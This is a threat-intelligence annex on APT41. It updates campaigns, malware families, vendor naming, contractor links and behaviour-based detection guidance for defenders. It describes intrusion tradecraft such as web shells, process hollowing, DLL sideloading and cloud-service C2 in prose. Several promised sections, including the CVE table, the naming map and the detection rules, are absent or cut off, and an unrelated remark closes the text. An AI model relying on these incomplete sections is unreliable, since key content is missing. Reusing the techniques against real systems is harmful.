Modus Operandi: APT41 (Double Dragon) Dossier Enrichment Research
Executive Summary
This annex updates the existing APT41 dossier on three axes you prioritized: currency, deployable detection content for the highest-value techniques, and sharper analytic and strategic framing. The three findings below should drive the edits.
Priority 1 — Currency (2023–2026)
1.1 Recent campaigns and geographic / sector shifts
APT41 DUST campaign. Reported by Mandiant / Google Threat Intelligence Group in July 2024. Documented sustained intrusions since 2023 against global shipping and logistics, media and entertainment, technology, and automotive sectors, with a victim majority in Italy, Spain, Taiwan, Thailand, Turkey, and the UK. A useful analytic nuance for the sector/geography matrix: shipping and logistics victims concentrated in Europe and the Middle East, while media and entertainment victims were in Asia, and many shipping victims were subsidiaries of multinationals. Confidence: Documented.
TOUGHPROGRESS / Google Calendar C2. Reported by Google Threat Intelligence Group in May 2025; activity discovered in late October 2024. Assessed with high confidence to APT41. The chain ran from a spear-phishing link to a ZIP hosted on a compromised government website, an LNK masquerading as a PDF, and three in-memory modules: PLUSDROP (decrypts and loads the next stage in memory), PLUSINJECT (process hollowing into a legitimate svchost.exe), and TOUGHPROGRESS (the Google Calendar C2 implant). C2 used zero-minute calendar events on hardcoded dates, a hardcoded XOR key with per-message keys, and LZNT1 compression. Google disrupted the operation by terminating attacker Workspace projects and Calendar instances and updating Safe Browsing. Victimology scale was not disclosed and should be flagged as an intelligence gap. Confidence: Documented.
Africa expansion. Reported by Kaspersky in July 2025 and attributed to APT41 with high confidence. The case is significant because, in Kaspersky’s own framing, Africa had previously experienced the least activity from this actor. Initial access was via an internet-exposed web server; credentials were harvested through registry dumping, yielding a local-admin domain account and a backup account with domain-admin rights. A captive internal SharePoint server was used as C2 (web shell CommandHandler.aspx) precisely because it was an existing internal service unlikely to raise suspicion. Tooling included Impacket, WMI, Cobalt Strike, and DLL sideloading, with an HTA fetched from a GitHub-impersonating domain. C2 infrastructure overlapped with prior APT41 domains. Confidence: Documented.
RevivalStone. Reported by LAC (Japan) in February 2025, overlapping Trend Micro, Cybereason, and Symantec tracking. A Winnti/APT41 sub-cluster targeting Japanese manufacturing, materials, and energy in March 2024, with references to the TreadStone controller (also present in the i-Soon leak) and a StoneV5 toolset. Confidence: Documented.
Earth Baku. Reported by Trend Micro. An APT41 sub-cluster that since late 2022 expanded from the Indo-Pacific into Europe, the Middle East, and Africa, exploiting public-facing IIS servers. Confidence: Documented.
Activity-volume signal. Trellix reported in April 2025 that China-aligned APT41 showed a 113% increase in activity in Q1 2025 relative to the prior quarter, against a backdrop of sharply rising APT detections overall. Treat as a single-vendor metric indicative of tempo rather than absolute scope. Confidence: Assessed (single source).
1.2 CVEs — with attribution discipline
APT41’s primary documented initial-access vector remains exploitation of public-facing applications, and historically it has been extraordinarily fast. The table separates exploitation genuinely associated with APT41 from CVEs that secondary reporting frequently mislabels as APT41 but that are attributed to other PRC clusters.
1.3 New and updated malware and tooling (2023–2026)
• TOUGHPROGRESS / PLUSDROP / PLUSINJECT (GTIG, May 2025). Google Calendar C2; fully in-memory; process hollowing into svchost.exe. GTIG published matching YARA.
• DodgeBox / MoonWalk (Zscaler, July 2024). DodgeBox is an upgraded StealthVector/DUSTPAN loader using DLL sideloading via a Sandboxie-signed taskhost.exe, call-stack spoofing, DLL hollowing, and environment guardrails. MoonWalk is a backdoor using Google Drive C2 and abusing Windows Fibers for evasion. Attributed to APT41 with medium confidence. Mandiant tracks the same families as DUSTPAN/DUSTTRAP.
• DUSTPAN / DUSTTRAP / BEACON / ANTSWORD / BLUEBEAM / SQLULDR2 / PINEGROVE (Mandiant, July 2024). ANTSWORD and BLUEBEAM web shells on a Tomcat/Apache server led to certutil downloads of DUSTPAN (disguised as w3wp.exe / conn.exe, persisted via a service named “Windows Defend”), which loaded an encrypted BEACON behind Cloudflare, then DUSTTRAP, an in-memory multi-stage plugin framework that trojanizes a legitimate DLL in memory and restores the clean file on disk to evade scans. DUSTTRAP was code-signed with stolen certificates, including one tied to a South Korean gaming company. SQLULDR2 exports Oracle databases; PINEGROVE exfiltrates to OneDrive via the OneDrive API.
• VOLDEMORT (Proofpoint, August 2024). A C backdoor using Google Sheets for C2, attributed to TA415 / APT41 / Brass Typhoon on infrastructure overlap. The campaign ran over 20,000 messages across more than 70 organizations beginning 5 August 2024, impersonating tax authorities across multiple countries, with DLL sideloading via Cisco-branded binaries and a late-August aerospace sub-campaign.
• GC2 (Google TAG, April 2023). Google Sheets and Drive C2 against a Taiwanese media organization — the precursor cloud-C2 case in the multi-year arc.
• Established arsenal still in play. ShadowPad, PlugX, KEYPLUG, Cobalt Strike, MESSAGETAP, and the MoonBounce UEFI implant, with free-hosting distribution (Cloudflare Workers most frequent) observed since at least August 2024.
1.4 Vendor and government naming concordance
Assembling the cross-vendor naming map in one place is exactly the premium differentiation that free vendor blogs rarely provide, and it directly supports the attribution-discipline message.
authorized seizure of accounts, servers, domains, and C2 dead-drop pages executed with major technology providers. No new APT41-specific U.S. or allied government enforcement action exists for 2023–2026; the March 2025 indictment of twelve Chinese nationals concerns i-Soon and APT27/Silk Typhoon, not APT41. This is a verified negative finding the dossier should state plainly.
1.5 i-Soon and the contractor ecosystem
The i-Soon document leak of February 2024 (roughly 570 documents) supplies primary-source corroboration of the contractor ecosystem surrounding APT41. Analysts concluded the leak reveals how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire, with i-Soon contracting to the MSS, MPS, and PLA, and showing support for ShadowPad development. Chengdu 404, the front named in the APT41 indictment, is connected to i-Soon through litigation and a likely subcontractor relationship — both Chengdu-based. This is direct corroboration of the dossier’s dual-mandate and contractor model, although i-Soon’s own intrusions should not be equated with APT41.
Priority 2 — Detection Engineering (Big Hitters)
Each technique below provides a Sigma rule, an equivalent or complementary KQL query for Microsoft Defender XDR / Sentinel Advanced Hunting, and false-positive and tuning notes. The rules are behavior-based (parent/child relationships, LOLBins, cloud-C2 patterns) rather than IOC-based, so they survive infrastructure churn. The cloud-service C2 analytic in section 2.5 is the single highest-value modern addition.
2.1 Web-shell child-process anomaly (T1505.003 / T1190)
Grounded in ANTSWORD/BLUEBEAM on Tomcat (DUST campaign, 2023) and CommandHandler.aspx on SharePoint (Africa, 2025).
2.4 Code-signing abuse and DLL-sideload pairs (T1553.002 / T1574.002)
Grounded in DUSTTRAP stolen certificates and specific sideloading host/payload pairs.
Tuning. A generic “signed binary from a user-writable path” rule is high-FP (Teams, updaters), so prioritize the actual APT41 host/payload pairs and validate by load path and DLL signature. Where certificate telemetry is available, hunt signed-but-revoked binaries and unusual issuers, including the stolen DUSTTRAP certificate if your intelligence feed carries its serial.
2.5 Cloud-service C2 beaconing — Calendar / Sheets / Drive / OneDrive
Grounded in TOUGHPROGRESS (Calendar), VOLDEMORT (Sheets), MoonWalk (Drive), and PINEGROVE (OneDrive). This is APT41’s defining modern tradecraft and the highest-value analytic in this annex.
Tuning. The destination is legitimate, so anchor on the process, not the domain. For TOUGHPROGRESS the caller is an injected svchost.exe with odd service-host arguments; for VOLDEMORT it is a sideloaded DLL host. Add beaconing-regularity logic (low jitter, fixed-interval polling). For Workspace and M365 tenants, hunt OAuth consent grants and refresh-token use by non-standard client IDs, and time-series anomalies on a service principal’s Graph or Drive API volume.
2.6 Exfiltration to cloud storage — OneDrive via PINEGROVE (T1567.002)
2.7 Service persistence — DUSTPAN service masquerade (T1543.003)
Priority 3 — Analytic and Strategic Depth
3.1 Contractor / dual-mandate model — upgrade toward Documented
The original dossier likely frames the contractor and dual-mandate model as an assessment. The i-Soon leak of February 2024 now supplies primary-source corroboration of the surrounding ecosystem, showing how government targeting requirements drive a competitive marketplace of contractor hackers-for-hire. With Chengdu 404 (the named APT41 front) tied by litigation to i-Soon, the framing can move from assessed toward documented, citing i-Soon as a structural analogue for how MSS and MPS tasking, target lists, and tool-sharing flow through Chengdu-based contractors — while being careful not to equate i-Soon’s own intrusions with APT41.
3.2 Cloud / SaaS / identity persistence — upgrade Watch item to Documented
Any prior treatment of cloud-fronted C2 as a watch item is now superseded. Cloud and SaaS C2 is documented for APT41 specifically across a multi-year arc: Google Sheets and Drive via GC2 (April 2023), Google Workspace and OneDrive via DUSTTRAP and PINEGROVE (July 2024), Google Sheets via VOLDEMORT (August 2024), Google Drive via MoonWalk (July 2024), and Google Calendar via TOUGHPROGRESS (discovered October 2024, disclosed May 2025). This is APT41’s defining 2023–2025 evolution and should be elevated to a top-line finding, paired with the detection logic in section 2.5.
3.3 PRC landscape — situate APT41 against the Typhoon clusters
APT41 (Brass Typhoon / Barium) is distinct from the clusters most often confused with it. The dossier should state these de-conflictions explicitly, because aggregator blogs frequently mislabel their activity as APT41.
• Volt Typhoon — OT and critical-infrastructure pre-positioning, living-off-the-land, multi-year dwell, SOHO-router proxying.
• Salt Typhoon — telecom and ISP intrusion and metadata theft (GhostSpider, Demodex rootkit). Some vendors loosely label this “APT41/Barium”; that is imprecise.
• Silk Typhoon (APT27 / Hafnium) — IT supply chain, stolen API keys, MSP and RMM abuse; named in the March 2025 DOJ action. Distinct from APT41.
• Linen Typhoon (APT27), Violet Typhoon (APT31), Storm-2603 — the SharePoint ToolShell exploiters. Distinct from APT41.
• UNC5221 — the Ivanti edge-appliance specialist. Distinct from APT41 and not yet promoted to a named APT.
3.4 AI-assisted operations — strategic outlook only, not APT41
3.5 Analytic gaps to tighten or qualify
• Tighten: cloud C2 from watch item to documented (3.2).
• Tighten: the contractor and dual-mandate model with i-Soon primary-source evidence (3.1).
• Tighten: add the cross-vendor naming concordance and de-confliction table (1.4, 3.3).
• Qualify: do not attribute the Ivanti or SharePoint ToolShell CVEs to APT41 (1.2).
• Qualify: state plainly that no new DOJ or sanctions action exists since 2020.
• Qualify: the Chrome V8 CVE-2025-6554 link to APT41 is secondary-sourced and low-confidence.
• Gap: TOUGHPROGRESS victimology scale is unclear; the disclosing vendor declined specifics.
Recommendations (Staged, with Revisit Thresholds)
Stage 1 — Immediate editorial fixes (currency and correctness)
1. Insert a new top-line section on cloud and SaaS C2 as APT41’s defining 2023–2025 tradecraft (TOUGHPROGRESS, VOLDEMORT, MoonWalk, DUSTTRAP), with the section 2.5 detection logic attached.
2. Add the Africa government-IT case (Kaspersky, July 2025) and the DUST campaign (Mandiant, July 2024) to the campaign timeline and the sector/geography matrix.
3. Insert the attribution-discipline box: correct any APT41 labeling of the Ivanti (UNC5221) and SharePoint ToolShell (APT27/APT31/Storm-2603) CVEs.
4. Update the legal section to state the verified negative finding — no post-2020 APT41 action.
Revisit threshold: if a new indictment, sanction, or government advisory explicitly names APT41 or Brass Typhoon, promote it from a negative finding to a dedicated section.
Stage 2 — Detection content (deployable)
Ship the section 2.1–2.7 Sigma and KQL as a big-hitter pack, leading with the chained web-shell to archive to cloud-egress analytic (2.1) and the non-browser cloud-C2 analytic (2.5). Pair each with its false-positive and tuning notes, and layer vendor YARA for TOUGHPROGRESS as secondary IOC coverage.
Revisit threshold: if telemetry lacks image-load events or proxy logs, prioritize the process-creation rules (2.1–2.4, 2.7) and the OAuth and cloud-app hunts.
Stage 3 — Strategic framing
Add the i-Soon contractor analysis (3.1), the Typhoon de-confliction table (3.3), and an AI-outlook box clearly fenced from APT41 attribution (3.4).
Revisit threshold: if a vendor publishes APT41-specific AI-tooling evidence, upgrade section 3.4 from outlook to a documented finding.















How about the new cognitive warfare nutraluzing target by applying friction in the prescription layer of target.
Thank you for making this material available.